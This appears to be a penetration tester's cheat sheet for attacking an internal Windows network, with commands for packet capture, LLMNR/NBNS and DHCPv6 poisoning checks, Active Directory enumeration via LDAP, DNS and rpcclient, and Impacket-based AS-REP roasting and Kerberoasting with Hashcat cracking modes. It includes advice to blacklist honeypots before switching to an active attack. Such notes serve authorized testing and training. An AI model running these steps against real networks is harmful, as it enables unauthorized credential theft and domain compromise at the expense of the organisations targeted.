Save a packet capture:
tcpdump -i <interface> -s0 -w pcapfile.pcap
Ctrl-C to stop after about 5 minutes. Replay capture and look for interesting protocols:
tcpdump -r pcapfile.pcap not <host IP address> and not arp
Do you see LLMNR and NetBIOS (NBNS)? Responder and SMB relay. DHCPv6 broadcasts? mitm6 and ntlmrelay. Make a note of the domain name found in the pcap to use in following later steps in the Recon section. Do you see routing protocols? If yes, scp the pcap file over to your system and open in Wireshark. An example to look for is OSPF. It should only be broadcasting on links to other routers, not on user subnet interfaces. The default for Cisco OSPF configurations is to broadcast to all interfaces with null authentication which could allow anyone to exploit it. Also check capture for HSRP default plaintext authentication with a password of 'cisco'.
Tcpdump filter for DHCPv6: tcpdump -i eth0 -n -vv '(udp port 546 or 547) or icmp6'
fierce -d <domain.name>
amass -ip -active -d example.com
With credentials:
Install: pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump
Enumerate: adidnsdump -r -u <domain>\\<username> <DC>
apt install avahi-utils
avahi-browse -a -v -r
Start in Analyze mode (passive)
./Responder.py -I <interface> -A
Do you see any obvious honeypot systems? If yes, blacklist them in the configuration before switching to an active attack.
Do you see LLNR and NetBIOS (NBNS)? If Yes, proceed to SMB Relaying.
If no, check your packet capture for DHCPv6. If found, proceed to SMB Relaying.
ldapsearch -h <DC IP> -x -s base namingcontexts
First you'll need the domain name. You should be able to find that in the tcpdump output.
Next, run:
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g' > domaincontrollers.out
Using ldapsearch: ldapsearch -h <DC IP> -x -b "DC=htb,DC=local", replace "DC=htb,DC=local" with values found from previous ldapsearch for namingcontexts above.
If you get usernames, run Impacket GetNPUsers.py on them and crack any hashes that you get. This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.
Using Impacket:
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
Crack hashes using Hashcat mode 18200.
Run the CrackMapExec gpp_password and gpp_autologon modules to search for passwords in Group Policy Preferences:
Interactive:
rpcclient -U "DOMAIN/username%password" <domaincontroller name/IP"
Common rpcclient commands (suffix to the above command):
-c dsr_enumtrustdom
-c enumdomains
-c enumdomusers
-c enumdomgroups
-c getdompwinfo
Windapsearch: https://github.com/ropnop/windapsearch (has a nice feature that will display DA's through nested groups which doesn't show up when you use 'net groups "Domain Admins" /domain')
Using Impacket:
GetUserSPNs.py -request -save -dc-ip <IP> domain/user
Crack hashes using Hashcat mode 13100